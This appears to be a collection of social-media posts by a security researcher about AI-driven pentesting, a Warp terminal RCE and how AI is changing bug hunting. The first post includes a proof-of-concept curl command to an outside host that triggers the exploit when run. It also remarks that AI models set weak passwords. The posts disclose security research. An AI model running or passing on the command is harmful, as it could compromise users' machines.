TUIs getting stronger only means they’re also making it fun to hack. @warpdotdev terminal RCE by @rootxharsh and @HacktronAI PoC: run this in warp terminal and get pwned. curl htxp://rce.ee/warp-pwn.php Details below:

RCE in Warp Terminal! I believe the attack surface is broadening with every new tool you use. Every OAuth app you authorise with elevated scopes.. we'd see more breaches via targeting tools/SaaS.. the attack surface is everyone and everything now - hacktron.ai/blog/the-attack-…

Really hope more people get to try Hacktron. You guys are doing great so far and I love the open source initiative

won't say its perfect yet, still lot to improve in terms of reducing false positives, but so far good response. if you have open source project, we review for free, apply here: hacktron.ai/open-source if not, try the free trail

Lol sure.

So @Doyensec recently published a report comparing @xbow and @AikidoSecurity, two AI pentest platforms. I figured, why not run @HacktronAI on the same test? So I ran a pentest on one of the target. Hacktron cost $350, while XBOW and Aikido cost $4,000 each. We did pretty well!

Introducing Hacktron Whitebox: get white-box security assessments with audit-ready reports without waiting on a traditional pentest cycle. AI has roughly tripled the rate of code shipped in the past year. But penetration testing has not kept pace, often taking weeks to months.

Models tend to set up very bruteforce-able passwords in most cases. Related to company name, year, task, context, etc. Golden era for credential brute-force attacks in the coming months.

its a great feeling to see the thing you worked on for over a year starts creating value

Can Mythos find React2Shell and exploit it?

Last year, on a vacation, @S1r1u5_ and I were discussing about the human need for validation and how most things we do can be tied to it, consciously or subconsciously. Mohan asked, Would you still be doing what you do (hacking, publishing blogs, competing, etc.) if no one was there to see it? At that time, my answer was "yeah, probably?" Today, the world has somewhat come to that. All the things you thought gave you validation are now norms. Things you once took pride in can be replicated in a few prompts. I mean, people are dropping 0days everyday now, and there's an unlikely chance of your blog getting reads so there goes that validation. So would you still do it on your own? For your own sake and sanity? My answer is a confident yes now. In the last couple of months, I've seen models find bugs autonomously or sometimes with just a bit of a hunch from me, but sharing these bugs publicly hasn't been rewarding. And not in the sense of likes or reach alone, I've just been less motivated overall. I have a few blogs sitting in my queue, and what I'm noticing is I keep procrastinating, because there's not much authenticity to my own work in them, and I don't have the enthusiasm to share the same story again, how the model found this and that. I think if you really love the game, sooner or later, you have to come to terms with the fact that to stay sane, you need to go back to that problem-solving phase, otherwise it gets pretty depressing. As much as I love watching LLMs find bugs, it feels soulless at times.. all this is a signal to me that I can't function like this in the long run. It makes me feel dopamine-deprived, and I need to be hacking shit on my own.. Now, when I say "on my own", I don't mean no AI, AI bad. No, not at all.. There's a big difference between using an LLM as an accelerator in your work vs delegating your understanding to it. From a long-term pov, the former is the only path imo, and even then, the mind map you build on your own is very different from the one you'd end up with leaning on LLMs. The dopamine hit isn't even close to figuring shit out on your own. Seeing how AI is making 0days the norm and CTFs no longer the same.. The question is more real now than ever. Would you still sit down and hack stuff even when no one's watching, knowing people might be on top of the leaderboard via AI, just for the love for the game?

StubZero: $148,337 RCE in Google Cloud Production brutecat.com/articles/google…